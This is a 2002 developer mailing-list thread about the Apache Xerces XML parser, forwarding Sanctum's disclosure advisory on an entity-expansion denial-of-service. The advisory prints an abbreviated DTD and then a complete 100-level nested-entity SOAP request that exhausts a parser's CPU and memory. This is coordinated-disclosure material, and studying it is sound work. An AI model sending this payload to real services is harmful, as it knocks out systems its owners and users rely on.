Okay, It looks like Sanctum has decided that Xerces is the problem, and
they are going to issue a security
alert against us. Other than Sanjiva's suggetsion of a flag to turn off
internal (or probably all) entity expansion,
does anyone have any other ideas of how to fix this?
Ted
----- Original Message -----
From: "Ben Laurie" <[EMAIL PROTECTED]>
To: "Ted Leung" <[EMAIL PROTECTED]>
Sent: Wednesday, November 27, 2002 3:37 AM
Subject: [Fwd: Security Alert - Xerces]
> Here ya go. Please keep security@ copied on any followups...
>
> Cheers,
>
> Ben.
>
> --
> http://www.apache-ssl.org/ben.html http://www.thebunker.net/
>
> "There is no limit to what a man can do or how far he can go if he
> doesn't mind who gets the credit." - Robert Woodruff
>
--- Begin Message ---
Dear [EMAIL PROTECTED],
During a recent security audit at one of our customers, Sanctum found a
security vulnerability in your product Xerces.
The details of this vulnerability are described in the attached text file.
We intend to issue a public advisory on BugTraq, SecuriTeam and other site
forums about this vulnerability the last week of November. Please note, the
advisory will not contain specifics that might enable someone to exploit the
vulnerability.
We would appreciate it if you could issue a patch in that timeline (i.e.
around November 25th), so it can be linked to our advisory.
Please feel free to contact me for more information/help.
Thanks,
-Amit
<<XML_DTD_Xerces.txt>>
///////////////////////////////////////////////////////////////////////
========================>> Security Advisory <<========================
///////////////////////////////////////////////////////////////////////
=> Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
=> Release date: 14/Nov/2002
=> Vendor: Apache Group
The following product was found to be vulnerable:
- Apache Xerces XML parser
The versions affected are the latest ones (as of October 2002).
=> Severity: High
=> CVE candidate: Not assigned yet.
=> Summary: Using the DTD part of the XML document, it is possible to cause the
XML parser to consume 100% CPU and a lot of memory, therefore resulting in
a denial of service condition.
=> Description: The DTD part of the XML document enables the document to define
named entities (other than the predefined <, >, etc.). The entities can be
defined using other entities (recursion is prohibited in XML 1.0).
Entities are expanded when they are referenced, inside the XML document.
The attack is comprised of defining and referencing an entity which is defined
using two instances of another entity, which is (in turn) defined as two instances
of yet another entity, and so on. This definition process can be repeated as long
as "necessary" - we found that nesting level of 100 is usually sufficient.
The 100th entity should be defined simply as a string. This has the effect of having
the first entity contain, in theory, 2^99 (two to the power of ninety nine)
concatenated values of the 100th entity.
Here's an example (the DTD is to be placed after the XML declaration, and before the
root element of the XML document):
<!DOCTYPE root [
<!ENTITY x100 "foobar">
<!ENTITY x99 "&x100;&x100;">
<!ENTITY x98 "&x99;&x99;">
<!ENTITY x97 "&x98;&x98;">
...
<!ENTITY x3 "&x4;&x4;">
<!ENTITY x2 "&x3;&x3;">
<!ENTITY x1 "&x2;&x2;">
]>
Referring to the first entity inside a document that would otherwise be accepted by
the application (using the syntax &x1;), results in a DoS condition, due to the
excessive CPU load and memory required by the XML parser to expand this entity.
It should be noted that this attack works only when the XML product does indeed honor
the DTD directives embedded in the document. Also, it is required that the data in
which the entity is embedded to be required by the application (at least in some
implementations) in order for the entity to be expanded and the attack to take place.
=> Solution: Not available yet.
=> Workaround:
If possible, disable DTD in the XML parser.
=> Example (SOAP):
Ory Segal from Sanctum provided the following example:
The request is:
POST path_to_web_service HTTP/1.0
Host: ...
Content-Type: text/xml
SOAPAction: ""
Content-Length: 3224
<?xml version="1.0" ?>
<!DOCTYPE foobar [
<!ENTITY x0 "hello">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
<!ENTITY x3 "&x2;&x2;">
<!ENTITY x4 "&x3;&x3;">
<!ENTITY x5 "&x4;&x4;">
<!ENTITY x6 "&x5;&x5;">
<!ENTITY x7 "&x6;&x6;">
<!ENTITY x8 "&x7;&x7;">
<!ENTITY x9 "&x8;&x8;">
<!ENTITY x10 "&x9;&x9;">
<!ENTITY x11 "&x10;&x10;">
<!ENTITY x12 "&x11;&x11;">
<!ENTITY x13 "&x12;&x12;">
<!ENTITY x14 "&x13;&x13;">
<!ENTITY x15 "&x14;&x14;">
<!ENTITY x16 "&x15;&x15;">
<!ENTITY x17 "&x16;&x16;">
<!ENTITY x18 "&x17;&x17;">
<!ENTITY x19 "&x18;&x18;">
<!ENTITY x20 "&x19;&x19;">
<!ENTITY x21 "&x20;&x20;">
<!ENTITY x22 "&x21;&x21;">
<!ENTITY x23 "&x22;&x22;">
<!ENTITY x24 "&x23;&x23;">
<!ENTITY x25 "&x24;&x24;">
<!ENTITY x26 "&x25;&x25;">
<!ENTITY x27 "&x26;&x26;">
<!ENTITY x28 "&x27;&x27;">
<!ENTITY x29 "&x28;&x28;">
<!ENTITY x30 "&x29;&x29;">
<!ENTITY x31 "&x30;&x30;">
<!ENTITY x32 "&x31;&x31;">
<!ENTITY x33 "&x32;&x32;">
<!ENTITY x34 "&x33;&x33;">
<!ENTITY x35 "&x34;&x34;">
<!ENTITY x36 "&x35;&x35;">
<!ENTITY x37 "&x36;&x36;">
<!ENTITY x38 "&x37;&x37;">
<!ENTITY x39 "&x38;&x38;">
<!ENTITY x40 "&x39;&x39;">
<!ENTITY x41 "&x40;&x40;">
<!ENTITY x42 "&x41;&x41;">
<!ENTITY x43 "&x42;&x42;">
<!ENTITY x44 "&x43;&x43;">
<!ENTITY x45 "&x44;&x44;">
<!ENTITY x46 "&x45;&x45;">
<!ENTITY x47 "&x46;&x46;">
<!ENTITY x48 "&x47;&x47;">
<!ENTITY x49 "&x48;&x48;">
<!ENTITY x50 "&x49;&x49;">
<!ENTITY x51 "&x50;&x50;">
<!ENTITY x52 "&x51;&x51;">
<!ENTITY x53 "&x52;&x52;">
<!ENTITY x54 "&x53;&x53;">
<!ENTITY x55 "&x54;&x54;">
<!ENTITY x56 "&x55;&x55;">
<!ENTITY x57 "&x56;&x56;">
<!ENTITY x58 "&x57;&x57;">
<!ENTITY x59 "&x58;&x58;">
<!ENTITY x60 "&x59;&x59;">
<!ENTITY x61 "&x60;&x60;">
<!ENTITY x62 "&x61;&x61;">
<!ENTITY x63 "&x62;&x62;">
<!ENTITY x64 "&x63;&x63;">
<!ENTITY x65 "&x64;&x64;">
<!ENTITY x66 "&x65;&x65;">
<!ENTITY x67 "&x66;&x66;">
<!ENTITY x68 "&x67;&x67;">
<!ENTITY x69 "&x68;&x68;">
<!ENTITY x70 "&x69;&x69;">
<!ENTITY x71 "&x70;&x70;">
<!ENTITY x72 "&x71;&x71;">
<!ENTITY x73 "&x72;&x72;">
<!ENTITY x74 "&x73;&x73;">
<!ENTITY x75 "&x74;&x74;">
<!ENTITY x76 "&x75;&x75;">
<!ENTITY x77 "&x76;&x76;">
<!ENTITY x78 "&x77;&x77;">
<!ENTITY x79 "&x78;&x78;">
<!ENTITY x80 "&x79;&x79;">
<!ENTITY x81 "&x80;&x80;">
<!ENTITY x82 "&x81;&x81;">
<!ENTITY x83 "&x82;&x82;">
<!ENTITY x84 "&x83;&x83;">
<!ENTITY x85 "&x84;&x84;">
<!ENTITY x86 "&x85;&x85;">
<!ENTITY x87 "&x86;&x86;">
<!ENTITY x88 "&x87;&x87;">
<!ENTITY x89 "&x88;&x88;">
<!ENTITY x90 "&x89;&x89;">
<!ENTITY x91 "&x90;&x90;">
<!ENTITY x92 "&x91;&x91;">
<!ENTITY x93 "&x92;&x92;">
<!ENTITY x94 "&x93;&x93;">
<!ENTITY x95 "&x94;&x94;">
<!ENTITY x96 "&x95;&x95;">
<!ENTITY x97 "&x96;&x96;">
<!ENTITY x98 "&x97;&x97;">
<!ENTITY x99 "&x98;&x98;">
<!ENTITY x100 "&x99;&x99;">
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/";
xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance";
xmlns:xsd="http://www.w3.org/1999/XMLSchema";>
<SOAP-ENV:Body>
<ns1:aaa xmlns:ns1="urn:aaa"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/";>
<foobar xsi:type="xsd:string">&x100;</foobar>
</ns1:aaa>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
--- End Message ---
---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
